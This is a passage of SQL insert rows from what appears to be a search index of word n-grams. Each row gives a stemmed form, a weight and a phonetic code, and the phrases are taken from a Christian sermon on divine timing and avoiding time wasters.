(299776, 'number 16 wrong', 'number 16 wrong', 0, 1, 1.5, 'N1652', 1, '*'),
(299777, 'of aging', 'of aging', 0, 1, 1.2667, 'O1252', 1, '*'),
(299778, 'of aging because', 'of aging because', 0, 1, 1.5333, 'O125212', 1, '*'),
(299779, 'of david the', 'of david the', 0, 1, 1.4, 'O1313', 1, '*'),
(299780, 'of divine timing', 'of divine timing', 0, 1, 1.5333, 'O1315352', 1, '*'),
(299781, 'of grounds', 'of grounds', 0, 1, 1.3333, 'O126532', 1, '*'),
(299782, 'of grounds to', 'of grounds to', 0, 1, 1.4333, 'O1265323', 1, '*'),
(299783, 'of jerusalem', 'of jerusalem', 0, 1, 1.4, 'O126245', 1, '*'),
(299784, 'of jerusalem is', 'of jerusalem is', 0, 1, 1.5, 'O1262452', 1, '*'),
(299785, 'of murder', 'of murder', 0, 1, 1.3, 'O15636', 1, '*'),
(299786, 'of murder adultery', 'of murder adultery', 0, 1, 1.6, 'O156363436', 1, '*'),
(299787, 'of such time', 'of such time', 0, 1, 1.4, 'O1235', 1, '*'),
(299788, 'of them as', 'of them as', 0, 1, 1.3333, 'O1352', 1, '*'),
(299789, 'of this mess', 'of this mess', 0, 1, 1.4, 'O13252', 1, '*'),
(299790, 'of training that', 'of training that', 0, 1, 1.5333, 'O136523', 1, '*'),
(299791, 'of visitation', 'of visitation', 0, 1, 1.4333, 'O1235', 1, '*'),
(299792, 'of visitation luke', 'of visitation luke', 0, 1, 1.6, 'O123542', 1, '*'),
(299793, 'offences and', 'offenc and', 0, 1, 1.4, 'O15253', 1, '*'),
(299794, 'offences and unforgiveness', 'offenc and unforgiveness', 0, 1, 1.8667, 'O152535162152', 1, '*'),
(299795, 'old advanced', 'old advanced', 0, 1, 1.4, 'O431523', 1, '*'),
(299796, 'old advanced in', 'old advanced in', 0, 1, 1.5, 'O4315235', 1, '*'),
(299797, 'old age', 'old age', 0, 1, 1.2333, 'O432', 1, '*'),
(299798, 'old age as', 'old age as', 0, 1, 1.3333, 'O432', 1, '*'),
(299799, 'older if', 'older if', 0, 1, 1.2667, 'O4361', 1, '*'),
(299800, 'older if you', 'older if you', 0, 1, 1.4, 'O4361', 1, '*'),
(299801, 'or lack', 'or lack', 0, 1, 1.2333, 'O642', 1, '*'),
(299802, 'or lack of', 'or lack of', 0, 1, 1.3333, 'O6421', 1, '*'),
(299803, 'or overdone', 'or overdone', 0, 1, 1.3667, 'O61635', 1, '*'),
(299804, 'or overdone compromise', 'or overdone compromise', 0, 1, 1.7333, 'O61635251652', 1, '*'),
(299805, 'our lives david', 'our lives david', 0, 1, 1.5, 'O6412313', 1, '*'),
(299806, 'out for', 'out for', 0, 1, 1.2333, 'O316', 2, '*'),
(299807, 'out for the', 'out for the', 0, 1, 1.3667, 'O3163', 1, '*'),
(299808, 'out of this', 'out of this', 0, 1, 1.3667, 'O3132', 1, '*'),
(299809, 'over the past', 'over the past', 0, 1, 1.4333, 'O163123', 1, '*'),
(299810, 'overdone', 'overdon', 0, 0, 0.5333, 'O1635', 1, '*'),
(299811, 'overdone compromise', 'overdon compromise', 0, 1, 1.6333, 'O1635251652', 1, '*'),
(299812, 'overdone compromise regret', 'overdon compromise regret', 0, 1, 1.8667, 'O16352516526263', 1, '*'),
(299813, 'own heart', 'own heart', 0, 1, 1.3, 'O563', 1, '*'),
(299814, 'own heart act', 'own heart act', 0, 1, 1.4333, 'O56323', 1, '*'),
(299815, 'past it', 'past it', 0, 1, 1.2333, 'P230', 1, '*'),
(299816, 'past it is', 'past it is', 0, 1, 1.3333, 'P232', 1, '*'),
(299817, 'people down', 'peopl down', 0, 1, 1.3667, 'P435', 1, '*'),
(299818, 'people down you\'re', 'peopl down you', 0, 1, 1.6, 'P4356', 1, '*'),
(299819, 'people god didn\'t', 'peopl god didn', 0, 1, 1.5667, 'P42353', 1, '*'),
(299820, 'people these', 'peopl these', 0, 1, 1.4, 'P432', 1, '*'),
(299821, 'people these are', 'peopl these are', 0, 1, 1.5333, 'P4326', 1, '*'),
(299822, 'people will waste', 'peopl will waste', 0, 1, 1.5667, 'P423', 1, '*'),
(299823, 'period then', 'period then', 0, 1, 1.3667, 'P635', 1, '*'),
(299824, 'period then you\'ve', 'period then you', 0, 1, 1.6, 'P6351', 1, '*'),
(299825, 'plant', 'plant', 0, 0, 0.3333, 'P453', 1, '*'),
(299826, 'plant in', 'plant in', 0, 1, 1.2667, 'P4535', 1, '*'),
(299827, 'plant in your', 'plant in your', 0, 1, 1.4333, 'P45356', 1, '*'),
(299828, 'pleasure especially', 'pleasur especially', 0, 1, 1.6333, 'P4262124', 1, '*'),
(299829, 'pleasure especially when', 'pleasur especially when', 0, 1, 1.8, 'P42621245', 1, '*'),
(299830, 'possible wrong', 'possibl wrong', 0, 1, 1.4667, 'P214652', 1, '*'),
(299831, 'possible wrong people', 'possibl wrong people', 0, 1, 1.7, 'P21465214', 1, '*'),
(299832, 'problems as', 'problem as', 0, 1, 1.3667, 'P61452', 1, '*'),
(299833, 'problems as you', 'problem as you', 0, 1, 1.5, 'P61452', 1, '*'),
(299834, 'procrastination', 'procrastin', 0, 0, 1, 'P62623535', 1, '*'),
(299835, 'procrastination everyday', 'procrastin everyday', 0, 1, 1.8, 'P62623535163', 1, '*'),
(299836, 'procrastination everyday and', 'procrastin everyday and', 0, 1, 1.9333, 'P6262353516353', 1, '*'),
(299837, 'produces', 'produc', 0, 0, 0.5333, 'P632', 2, '*'),
(299838, 'produces avoidable', 'produc avoidable', 0, 1, 1.6, 'P6321314', 1, '*'),
(299839, 'produces avoidable mistakes', 'produc avoidable mistakes', 0, 1, 1.9, 'P63213145232', 1, '*'),
(299840, 'prophetic time', 'prophet time', 0, 1, 1.4667, 'P613235', 1, '*'),
(299841, 'prophetic time for', 'prophet time for', 0, 1, 1.6, 'P61323516', 1, '*'),
(299842, 'pursue', 'pursu', 0, 0, 0.4, 'P620', 1, '*'),
(299843, 'pursue god\'s', 'pursu god', 0, 1, 1.4, 'P6232', 1, '*'),
(299844, 'pursue god\'s course', 'pursu god course', 0, 1, 1.6333, 'P623262', 1, '*'),
(299845, 'reach out for', 'reach out for', 0, 1, 1.4333, 'R2316', 1, '*'),
(299846, 'rebellion miriam', 'rebellion miriam', 0, 1, 1.5333, 'R14565', 1, '*'),
(299847, 'rebellion miriam wasted', 'rebellion miriam wasted', 0, 1, 1.7667, 'R1456523', 1, '*'),
(299848, 'recognising', 'recognis', 0, 0, 0.7333, 'R25252', 1, '*'),
(299849, 'recognising divine', 'recognis divine', 0, 1, 1.6, 'R25252315', 1, '*'),
(299850, 'recognising divine timing', 'recognis divine timing', 0, 1, 1.8333, 'R25252315352', 1, '*'),
(299851, 'recovering', 'recov', 0, 0, 0.6667, 'R21652', 1, '*'),
(299852, 'recovering from', 'recov from', 0, 1, 1.5, 'R21652165', 1, '*'),
(299853, 'recovering from leprosy', 'recov from leprosy', 0, 1, 1.7667, 'R216521654162', 1, '*'),
(299854, 'regret don\'t', 'regret don', 0, 1, 1.4, 'R26353', 1, '*'),
(299855, 'regret don\'t mourn', 'regret don mourn', 0, 1, 1.6, 'R26353565', 1, '*'),
(299856, 'regret of', 'regret of', 0, 1, 1.3, 'R2631', 1, '*'),
(299857, 'regret of aging', 'regret of aging', 0, 1, 1.5, 'R2631252', 1, '*'),
(299858, 'relationships pleasure', 'relationship pleasure', 0, 1, 1.7333, 'R4352121426', 1, '*'),
(299859, 'relationships pleasure especially', 'relationship pleasure especially', 0, 1, 2, 'R43521214262124', 1, '*'),
(299860, 'remains', 'remain', 0, 0, 0.4667, 'R520', 1, '*'),
(299861, 'remains very', 'remain very', 0, 1, 1.4, 'R5216', 1, '*'),
(299862, 'remains very much', 'remain very much', 0, 1, 1.5667, 'R521652', 1, '*'),
(299863, 'respect for', 'respect for', 0, 1, 1.3667, 'R212316', 1, '*'),
(299864, 'respect for timing', 'respect for timing', 0, 1, 1.6, 'R212316352', 1, '*'),
(299865, 'rid', 'rid', 0, 0, 0.2, 'R300', 1, '*'),
(299866, 'rid of', 'rid of', 0, 1, 1.2, 'R310', 1, '*'),
(299867, 'rid of them', 'rid of them', 0, 1, 1.3667, 'R3135', 1, '*'),
(299868, 'right time', 'right time', 0, 1, 1.3333, 'R235', 1, '*'),
(299869, 'right time a', 'right time a', 0, 1, 1.4, 'R235', 1, '*'),
(299870, 'ruins', 'ruin', 0, 0, 0.3333, 'R520', 1, '*'),
(299871, 'ruins rebellion', 'ruin rebellion', 0, 1, 1.5, 'R526145', 1, '*'),
(299872, 'ruins rebellion miriam', 'ruin rebellion miriam', 0, 1, 1.7333, 'R52614565', 1, '*'),
(299873, 'sam 11', 'sam 11', 0, 1, 1.2, 'S500', 1, '*'),
(299874, 'sam 11 the', 'sam 11 the', 0, 1, 1.3333, 'S530', 1, '*'),
(299875, 'sam 12', 'sam 12', 0, 1, 1.2, 'S500', 1, '*'),
(299876, 'sam 12 10-14', 'sam 12 10-14', 0, 1, 1.4, 'S500', 1, '*'),
(299877, 'same there', 'same there', 0, 1, 1.3333, 'S536', 1, '*'),
(299878, 'same there is', 'same there is', 0, 1, 1.4333, 'S5362', 1, '*'),
(299879, 'says now', 'sai now', 0, 1, 1.2667, 'S500', 1, '*'),
(299880, 'says now joshua', 'sai now joshua', 0, 1, 1.5, 'S520', 1, '*'),
(299881, 'scars', 'scar', 0, 0, 0.3333, 'S620', 1, '*'),
(299882, 'scars 2', 'scar 2', 0, 1, 1.2333, 'S620', 1, '*'),
(299883, 'scars 2 sam', 'scar 2 sam', 0, 1, 1.3667, 'S625', 1, '*'),
(299884, 'schedule so', 'schedul so', 0, 1, 1.3667, 'S342', 1, '*'),
(299885, 'schedule so you', 'schedul so you', 0, 1, 1.5, 'S342', 1, '*'),
(299886, 'see in', 'see in', 0, 1, 1.2, 'S500', 2, '*'),
(299887, 'see in the', 'see in the', 0, 1, 1.3333, 'S530', 1, '*'),
(299888, 'she missed', 'she missed', 0, 1, 1.3333, 'S523', 1, '*'),
(299889, 'she missed her', 'she missed her', 0, 1, 1.4667, 'S5236', 1, '*'),
(299890, 'should have within', 'should have within', 0, 1, 1.6, 'S43135', 1, '*'),
(299891, 'shows up to', 'show up to', 0, 1, 1.3667, 'S130', 1, '*'),
(299892, 'sins using', 'sin using', 0, 1, 1.3333, 'S5252', 1, '*'),
(299893, 'sins using your', 'sin using your', 0, 1, 1.5, 'S52526', 1, '*'),
(299894, 'so you can', 'so you can', 0, 1, 1.3333, 'S500', 1, '*'),
(299895, 'some are', 'some are', 0, 1, 1.2667, 'S560', 1, '*'),
(299896, 'some are brought', 'some are brought', 0, 1, 1.5333, 'S561623', 1, '*'),
(299897, 'some by', 'some by', 0, 1, 1.2333, 'S510', 1, '*'),
(299898, 'some by men', 'some by men', 0, 1, 1.3667, 'S515', 1, '*'),
(299899, 'some came', 'some came', 0, 1, 1.3, 'S525', 1, '*'),
(299900, 'some came without', 'some came without', 0, 1, 1.5667, 'S5253', 1, '*'),
(299901, 'some of such', 'some of such', 0, 1, 1.4, 'S512', 1, '*'),
(299902, 'some things can\'t', 'some things can', 0, 1, 1.5667, 'S535253', 1, '*'),
(299903, 'some you', 'some you', 0, 1, 1.2667, 'S500', 1, '*'),
(299904, 'some you added', 'some you added', 0, 1, 1.4667, 'S530', 1, '*'),
(299905, 'step that', 'step that', 0, 1, 1.3, 'S313', 1, '*'),
(299906, 'step that led', 'step that led', 0, 1, 1.4333, 'S31343', 1, '*'),
(299907, 'still had', 'still had', 0, 1, 1.3, 'S343', 1, '*'),
(299908, 'still had a', 'still had a', 0, 1, 1.3667, 'S343', 1, '*'),
(299909, 'still in', 'still in', 0, 1, 1.2667, 'S345', 1, '*'),
(299910, 'still in mess', 'still in mess', 0, 1, 1.4333, 'S3452', 1, '*'),
(299911, 'stipulated', 'stipul', 0, 0, 0.6667, 'S3143', 1, '*'),
(299912, 'stipulated period', 'stipul period', 0, 1, 1.5667, 'S3143163', 1, '*'),
(299913, 'stipulated period then', 'stipul period then', 0, 1, 1.7333, 'S31431635', 1, '*'),
(299914, 'strategies', 'strategi', 0, 0, 0.6667, 'S3632', 1, '*'),
(299915, 'strategies you', 'strategi you', 0, 1, 1.4667, 'S3632', 1, '*'),
(299916, 'strategies you are', 'strategi you are', 0, 1, 1.6, 'S36326', 1, '*'),
(299917, 'substance of', 'substanc of', 0, 1, 1.4, 'S123521', 1, '*'),
(299918, 'substance of your', 'substanc of your', 0, 1, 1.5667, 'S1235216', 1, '*'),
(299919, 'successfully', 'successfulli', 0, 0, 0.8, 'S140', 1, '*'),
(299920, 'successfully got', 'successfulli got', 0, 1, 1.5333, 'S1423', 1, '*'),
(299921, 'successfully got him', 'successfulli got him', 0, 1, 1.6667, 'S14235', 1, '*'),
(299922, 'such time', 'such time', 0, 1, 1.3, 'S350', 1, '*'),
(299923, 'such time wasters', 'such time wasters', 0, 1, 1.5667, 'S352362', 1, '*'),
(299924, 'targets', 'target', 0, 0, 0.4667, 'T6232', 1, '*'),
(299925, 'targets this', 'target this', 0, 1, 1.4, 'T623232', 1, '*'),
(299926, 'targets this time', 'target this time', 0, 1, 1.5667, 'T62323235', 1, '*'),
(299927, 'that led david', 'that led david', 0, 1, 1.4667, 'T4313', 1, '*'),
(299928, 'that produces', 'that produces', 0, 1, 1.4333, 'T1632', 2, '*'),
(299929, 'that produces avoidable', 'that produces avoidable', 0, 1, 1.7667, 'T16321314', 1, '*'),
(299930, 'the beauty', 'the beauty', 0, 1, 1.3333, 'T130', 1, '*'),
(299931, 'the beauty youthful', 'the beauty youthful', 0, 1, 1.6333, 'T1314', 1, '*'),
(299932, 'the city', 'the city', 0, 1, 1.2667, 'T230', 1, '*'),
(299933, 'the city of', 'the city of', 0, 1, 1.3667, 'T231', 1, '*'),
(299934, 'the devil also', 'the devil also', 0, 1, 1.4667, 'T142', 1, '*'),
(299935, 'the devil some', 'the devil some', 0, 1, 1.4667, 'T1425', 1, '*'),
(299936, 'the devil successfully', 'the devil successfully', 0, 1, 1.7333, 'T14214', 1, '*'),
(299937, 'the future and', 'the future and', 0, 1, 1.4667, 'T13653', 1, '*'),
(299938, 'the king', 'the king', 0, 1, 1.2667, 'T252', 3, '*'),
(299939, 'the king conquer', 'the king conquer', 0, 1, 1.5333, 'T252526', 1, '*'),
(299940, 'the lord said', 'the lord said', 0, 1, 1.4333, 'T46323', 2, '*'),
(299941, 'the past it', 'the past it', 0, 1, 1.3667, 'T123', 1, '*'),
(299942, 'the right time', 'the right time', 0, 1, 1.4667, 'T6235', 1, '*'),
(299943, 'the same there', 'the same there', 0, 1, 1.4667, 'T2536', 1, '*'),
(299944, 'the substance of', 'the substance of', 0, 1, 1.5333, 'T2123521', 1, '*'),
(299945, 'the whole nation', 'the whole nation', 0, 1, 1.5333, 'T4535', 1, '*'),
(299946, 'them as', 'them as', 0, 1, 1.2333, 'T520', 1, '*'),
(299947, 'them as fast', 'them as fast', 0, 1, 1.4, 'T52123', 1, '*'),
(299948, 'then you\'ve', 'then you', 0, 1, 1.3667, 'T510', 1, '*'),
(299949, 'then you\'ve wasted', 'then you wasted', 0, 1, 1.6, 'T5123', 1, '*'),
(299950, 'there remains', 'there remains', 0, 1, 1.4333, 'T652', 1, '*'),
(299951, 'there remains very', 'there remains very', 0, 1, 1.6, 'T65216', 1, '*'),
(299952, 'there was regret', 'there was regret', 0, 1, 1.5333, 'T626263', 1, '*'),
(299953, 'these are people', 'these are people', 0, 1, 1.5333, 'T2614', 1, '*'),
(299954, 'they don\'t do', 'thei don do', 0, 1, 1.4333, 'T530', 1, '*'),
(299955, 'things at', 'thing at', 0, 1, 1.3, 'T523', 1, '*'),
(299956, 'things at the', 'thing at the', 0, 1, 1.4333, 'T523', 1, '*'),
(299957, 'things can\'t', 'thing can', 0, 1, 1.4, 'T5253', 1, '*'),
(299958, 'things can\'t just', 'thing can just', 0, 1, 1.5667, 'T525323', 1, '*'),
(299959, 'things however', 'thing however', 0, 1, 1.4667, 'T5216', 1, '*'),
(299960, 'things however the', 'thing however the', 0, 1, 1.6, 'T52163', 1, '*'),
(299961, 'this is because', 'thi is because', 0, 1, 1.5, 'T212', 1, '*'),
(299962, 'this mess', 'thi mess', 0, 1, 1.3, 'T252', 1, '*'),
(299963, 'this mess it', 'thi mess it', 0, 1, 1.4, 'T2523', 1, '*'),
(299964, 'this time', 'thi time', 0, 1, 1.3, 'T235', 1, '*'),
(299965, 'this time to', 'thi time to', 0, 1, 1.4, 'T2353', 1, '*'),
(299966, 'time 20', 'time 20', 0, 1, 1.2333, 'T500', 1, '*'),
(299967, 'time 20 decision', 'time 20 decision', 0, 1, 1.5333, 'T5325', 1, '*'),
(299968, 'time a', 'time a', 0, 1, 1.2, 'T500', 1, '*'),
(299969, 'time a mess', 'time a mess', 0, 1, 1.3667, 'T520', 1, '*'),
(299970, 'time and the', 'time and the', 0, 1, 1.4, 'T530', 1, '*'),
(299971, 'time for', 'time for', 0, 1, 1.2667, 'T516', 3, '*'),
(299972, 'time for your', 'time for your', 0, 1, 1.4333, 'T516', 1, '*'),
(299973, 'time of visitation', 'time of visitation', 0, 1, 1.6, 'T51235', 1, '*'),
(299974, 'time some', 'time some', 0, 1, 1.3, 'T525', 1, '*'),
(299975, 'time some things', 'time some things', 0, 1, 1.5333, 'T525352', 1, '*'),
(299976, 'time to commit', 'time to commit', 0, 1, 1.4667, 'T53253', 1, '*'),
(299977, 'time to introduce', 'time to introduce', 0, 1, 1.5667, 'T5353632', 1, '*'),
(299978, 'time wasters', 'time wasters', 0, 1, 1.4, 'T52362', 1, '*'),
(299979, 'time wasters from', 'time wasters from', 0, 1, 1.5667, 'T52362165', 1, '*'),
(299980, 'time wasters get', 'time wasters get', 0, 1, 1.5333, 'T523623', 1, '*'),
(299981, 'time wasters joshua', 'time wasters joshua', 0, 1, 1.6333, 'T52362', 1, '*'),
(299982, 'timing althoughdavid', 'time althoughdavid', 0, 1, 1.6667, 'T52432313', 1, '*'),
(299983, 'timing althoughdavid came', 'time althoughdavid came', 0, 1, 1.8333, 'T5243231325', 1, '*'),
(299984, 'timing and', 'time and', 0, 1, 1.3333, 'T5253', 1, '*'),
(299985, 'timing and as', 'time and as', 0, 1, 1.4333, 'T52532', 1, '*'),
(299986, 'timing could', 'time could', 0, 1, 1.4, 'T5243', 1, '*'),
(299987, 'timing could eventually', 'time could eventually', 0, 1, 1.7667, 'T52431534', 1, '*'),
(299988, 'timing for', 'time for', 0, 1, 1.3333, 'T5216', 1, '*'),
(299989, 'timing for your', 'time for your', 0, 1, 1.5, 'T5216', 1, '*'),
(299990, 'to be possessed', 'to be possessed', 0, 1, 1.5, 'T123', 1, '*'),
(299991, 'to commit', 'to commit', 0, 1, 1.3, 'T253', 1, '*'),
(299992, 'to commit evil', 'to commit evil', 0, 1, 1.4667, 'T25314', 1, '*'),
(299993, 'to correct yesterday\'s', 'to correct yesterday', 0, 1, 1.7333, 'T262323632', 1, '*'),
(299994, 'to cover', 'to cover', 0, 1, 1.2667, 'T216', 1, '*'),
(299995, 'to cover you', 'to cover you', 0, 1, 1.4, 'T216', 1, '*'),
(299996, 'to do the', 'to do the', 0, 1, 1.3, 'T000', 1, '*'),
(299997, 'to eliminate', 'to eliminate', 0, 1, 1.4, 'T453', 1, '*'),
(299998, 'to eliminate time', 'to eliminate time', 0, 1, 1.5667, 'T4535', 1, '*'),
(299999, 'to generational', 'to generational', 0, 1, 1.5, 'T256354', 1, '*'),
(300000, 'to generational problems', 'to generational problems', 0, 1, 1.8, 'T256354161452', 1, '*'),
(300001, 'to him you', 'to him you', 0, 1, 1.3333, 'T500', 1, '*'),
(300002, 'to initiate', 'to initiate', 0, 1, 1.3667, 'T530', 1, '*'),
(300003, 'to initiate new', 'to initiate new', 0, 1, 1.5, 'T535', 1, '*'),
(300004, 'to introduce', 'to introduce', 0, 1, 1.4, 'T53632', 1, '*'),
(300005, 'to introduce mess', 'to introduce mess', 0, 1, 1.5667, 'T5363252', 1, '*'),
(300006, 'to pursue', 'to pursue', 0, 1, 1.3, 'T162', 1, '*'),
(300007, 'to pursue god\'s', 'to pursue god', 0, 1, 1.5, 'T16232', 1, '*'),
(300008, 'to use it', 'to use it', 0, 1, 1.3, 'T230', 1, '*'),
(300009, 'today because', 'todai because', 0, 1, 1.4333, 'T120', 1, '*'),
(300010, 'today because she', 'todai because she', 0, 1, 1.5667, 'T120', 1, '*'),
(300011, 'train', 'train', 0, 0, 0.3333, 'T650', 1, '*'),
(300012, 'train yourself', 'train yourself', 0, 1, 1.4667, 'T656241', 1, '*'),
(300013, 'train yourself to', 'train yourself to', 0, 1, 1.5667, 'T6562413', 1, '*'),
(300014, 'training that produces', 'train that produces', 0, 1, 1.7333, 'T65231632', 1, '*'),
(300015, 'unbelief', 'unbelief', 0, 0, 0.5333, 'U5141', 1, '*'),
(300016, 'unbelief incomplete', 'unbelief incomplete', 0, 1, 1.6333, 'U5141525143', 1, '*'),
(300017, 'unbelief incomplete or', 'unbelief incomplete or', 0, 1, 1.7333, 'U51415251436', 1, '*'),
(300018, 'understand and', 'understand and', 0, 1, 1.4667, 'U536235353', 1, '*'),
(300019, 'understand and live', 'understand and live', 0, 1, 1.6333, 'U53623535341', 1, '*'),
(300020, 'understanding of divine', 'understand of divine', 0, 1, 1.7667, 'U5362353521315', 1, '*'),
(300021, 'undue', 'undu', 0, 0, 0.3333, 'U530', 1, '*'),
(300022, 'undue or', 'undu or', 0, 1, 1.2667, 'U536', 1, '*'),
(300023, 'undue or overdone', 'undu or overdone', 0, 1, 1.5667, 'U5361635', 1, '*'),
(300024, 'unforgiveness', 'unforg', 0, 0, 0.8667, 'U5162152', 1, '*'),
(300025, 'unforgiveness if', 'unforg if', 0, 1, 1.5333, 'U51621521', 1, '*'),
(300026, 'unforgiveness if you', 'unforg if you', 0, 1, 1.6667, 'U51621521', 1, '*'),
(300027, 'up 2', 'up 2', 0, 1, 1.1333, 'U100', 1, '*'),
(300028, 'up 2 sam', 'up 2 sam', 0, 1, 1.2667, 'U125', 1, '*'),
(300029, 'up to initiate', 'up to initiate', 0, 1, 1.4667, 'U1353', 1, '*'),
(300030, 'use it to', 'us it to', 0, 1, 1.3, 'U230', 1, '*'),
(300031, 'using your time', 'us your time', 0, 1, 1.5, 'U252635', 1, '*'),
(300032, 'very much', 'veri much', 0, 1, 1.3, 'V652', 1, '*'),
(300033, 'very much land', 'veri much land', 0, 1, 1.4667, 'V652453', 1, '*'),
(300034, 'visitation luke', 'visit luke', 0, 1, 1.5, 'V23542', 1, '*'),
(300035, 'visitation luke 19', 'visit luke 19', 0, 1, 1.6, 'V23542', 1, '*'),
(300036, 'was a man', 'wa a man', 0, 1, 1.3, 'W250', 1, '*'),
(300037, 'was his disrespect', 'wa his disrespect', 0, 1, 1.6, 'W23262123', 1, '*'),
(300038, 'was not without', 'wa not without', 0, 1, 1.5, 'W253', 1, '*'),
(300039, 'was old', 'wa old', 0, 1, 1.2333, 'W243', 1, '*'),
(300040, 'was old advanced', 'wa old advanced', 0, 1, 1.5333, 'W2431523', 1, '*'),
(300041, 'was regret', 'wa regret', 0, 1, 1.3333, 'W26263', 1, '*'),
(300042, 'was regret of', 'wa regret of', 0, 1, 1.4333, 'W262631', 1, '*'),
(300043, 'waste the substance', 'wast the substance', 0, 1, 1.6333, 'W23212352', 1, '*'),
(300044, 'wasted', 'wast', 0, 0, 0.4, 'W230', 1, '*'),
(300045, 'wasted her', 'wast her', 0, 1, 1.3333, 'W236', 1, '*'),
(300046, 'wasted her time', 'wast her time', 0, 1, 1.5, 'W23635', 1, '*'),
(300047, 'wasted time', 'wast time', 0, 1, 1.3667, 'W235', 1, '*'),
(300048, 'wasted time some', 'wast time some', 0, 1, 1.5333, 'W23525', 1, '*'),
(300049, 'wasters', 'waster', 0, 0, 0.4667, 'W2362', 1, '*'),
(300050, 'wasters from', 'waster from', 0, 1, 1.4, 'W2362165', 1, '*'),
(300051, 'wasters from your', 'waster from your', 0, 1, 1.5667, 'W23621656', 1, '*'),
(300052, 'wasters get', 'waster get', 0, 1, 1.3667, 'W23623', 1, '*'),
(300053, 'wasters get rid', 'waster get rid', 0, 1, 1.5, 'W2362363', 1, '*'),
(300054, 'wasters joshua', 'waster joshua', 0, 1, 1.4667, 'W2362', 1, '*'),
(300055, 'wasters joshua 13', 'waster joshua 13', 0, 1, 1.5667, 'W2362', 1, '*'),
(300056, 'what you should', 'what you should', 0, 1, 1.5, 'W3243', 1, '*'),
(300057, 'when they don\'t', 'when they don', 0, 1, 1.5, 'W5353', 1, '*'),
(300058, 'which you must', 'which you must', 0, 1, 1.4667, 'W2523', 1, '*'),
(300059, 'whole nation', 'whole nation', 0, 1, 1.4, 'W4535', 1, '*'),
(300060, 'whole nation recovering', 'whole nation recovering', 0, 1, 1.7667, 'W4535621652', 1, '*'),
(300061, 'will be inevitable', 'will be inevitable', 0, 1, 1.6, 'W4151314', 1, '*'),
(300062, 'will waste', 'will waste', 0, 1, 1.3333, 'W423', 1, '*'),
(300063, 'will waste the', 'will waste the', 0, 1, 1.4667, 'W423', 1, '*'),
(300064, 'wisdom is', 'wisdom is', 0, 1, 1.3, 'W2352', 2, '*'),
(300065, 'wisdom is actually', 'wisdom is actually', 0, 1, 1.6, 'W235234', 1, '*'),
(300066, 'wise man', 'wise man', 0, 1, 1.2667, 'W250', 1, '*'),
(300067, 'wise man on', 'wise man on', 0, 1, 1.3667, 'W250', 1, '*'),
(300068, 'with an', 'with an', 0, 1, 1.2333, 'W350', 1, '*'),
(300069, 'with an understanding', 'with an understanding', 0, 1, 1.7, 'W3536235352', 1, '*'),
(300070, 'within a', 'within a', 0, 1, 1.2667, 'W350', 1, '*'),
(300071, 'within a stipulated', 'within a stipulated', 0, 1, 1.6333, 'W3523143', 1, '*'),
(300072, 'without invitation', 'without invitation', 0, 1, 1.6, 'W35135', 1, '*'),
(300073, 'without invitation and', 'without invitation and', 0, 1, 1.7333, 'W351353', 1, '*'),
(300074, 'without scars', 'without scars', 0, 1, 1.4333, 'W3262', 1, '*'),
(300075, 'without scars 2', 'without scars 2', 0, 1, 1.5, 'W3262', 1, '*'),
(300076, 'works ruins', 'work ruins', 0, 1, 1.3667, 'W62652', 1, '*'),
(300077, 'works ruins rebellion', 'work ruins rebellion', 0, 1, 1.7, 'W626526145', 1, '*'),
(300078, 'wrong people', 'wrong people', 0, 1, 1.4, 'W65214', 1, '*'),
(300079, 'wrong people these', 'wrong people these', 0, 1, 1.6, 'W6521432', 1, '*'),
(300080, 'wrong people will', 'wrong people will', 0, 1, 1.5667, 'W65214', 1, '*'),
(300081, 'wrong relationships pleasure', 'wrong relationships pleasure', 0, 1, 1.9333, 'W65264352121426', 1, '*'),
(300082, 'years and the', 'year and the', 0, 1, 1.4333, 'Y6253', 1, '*'),
(300083, 'years and there', 'year and there', 0, 1, 1.5, 'Y62536', 1, '*'),
(300084, 'years you', 'year you', 0, 1, 1.3, 'Y620', 1, '*'),
(300085, 'years you need', 'year you need', 0, 1, 1.4667, 'Y6253', 1, '*'),
(300086, 'yesterday\'s', 'yesterdai', 0, 0, 0.7333, 'Y23632', 1, '*'),
(300087, 'yesterday\'s flaws', 'yesterdai flaws', 0, 1, 1.5667, 'Y23632142', 1, '*'),
(300088, 'yesterday\'s flaws fear', 'yesterdai flaws fear', 0, 1, 1.7333, 'Y2363214216', 1, '*'),
(300089, 'yet to', 'yet to', 0, 1, 1.2, 'Y300', 2, '*'),
(300090, 'yet to be', 'yet to be', 0, 1, 1.3, 'Y310', 1, '*'),
(300091, 'you added', 'you added', 0, 1, 1.3, 'Y300', 1, '*'),
(300092, 'you added by', 'you added by', 0, 1, 1.4, 'Y310', 1, '*'),
(300093, 'you are getting', 'you are getting', 0, 1, 1.5, 'Y62352', 1, '*'),
(300094, 'you are old', 'you are old', 0, 1, 1.3667, 'Y643', 1, '*'),
(300095, 'you can see', 'you can see', 0, 1, 1.3667, 'Y252', 1, '*'),
(300096, 'you grow', 'you grow', 0, 1, 1.2667, 'Y260', 2, '*'),
(300097, 'you grow in', 'you grow in', 0, 1, 1.3667, 'Y265', 2, '*'),
(300098, 'you hold', 'you hold', 0, 1, 1.2667, 'Y430', 1, '*'),
(300099, 'you hold people', 'you hold people', 0, 1, 1.5, 'Y4314', 1, '*'),
(300100, 'you must train', 'you must train', 0, 1, 1.4667, 'Y52365', 1, '*'),
(300101, 'you\'re also', 'you also', 0, 1, 1.3667, 'Y642', 1, '*'),
(300102, 'you\'re also held', 'you also held', 0, 1, 1.5333, 'Y64243', 1, '*'),
(300103, 'you\'ve wasted', 'you wasted', 0, 1, 1.4333, 'Y123', 1, '*'),
(300104, 'you\'ve wasted time', 'you wasted time', 0, 1, 1.6, 'Y1235', 1, '*'),
(300105, 'younger', 'younger', 0, 0, 0.4667, 'Y526', 1, '*'),
(300106, 'younger either', 'younger either', 0, 1, 1.4667, 'Y52636', 1, '*'),
(300107, 'younger either no', 'younger either no', 0, 1, 1.5667, 'Y526365', 1, '*'),
(300108, 'your daily schedule', 'your daily schedule', 0, 1, 1.6333, 'Y634234', 1, '*'),
(300109, 'your destiny offences', 'your destiny offences', 0, 1, 1.7, 'Y63235152', 1, '*'),
(300110, 'your life ecc', 'your life ecc', 0, 1, 1.4333, 'Y6412', 1, '*'),
(300111, 'your life some', 'your life some', 0, 1, 1.4667, 'Y64125', 1, '*'),
(300112, 'your life which', 'your life which', 0, 1, 1.5, 'Y6412', 1, '*'),
(300113, 'your lives', 'your lives', 0, 1, 1.3333, 'Y6412', 1, '*'),
(300114, 'your lives god', 'your lives god', 0, 1, 1.4667, 'Y64123', 1, '*'),
(300115, 'your time to', 'your time to', 0, 1, 1.4, 'Y6353', 1, '*'),
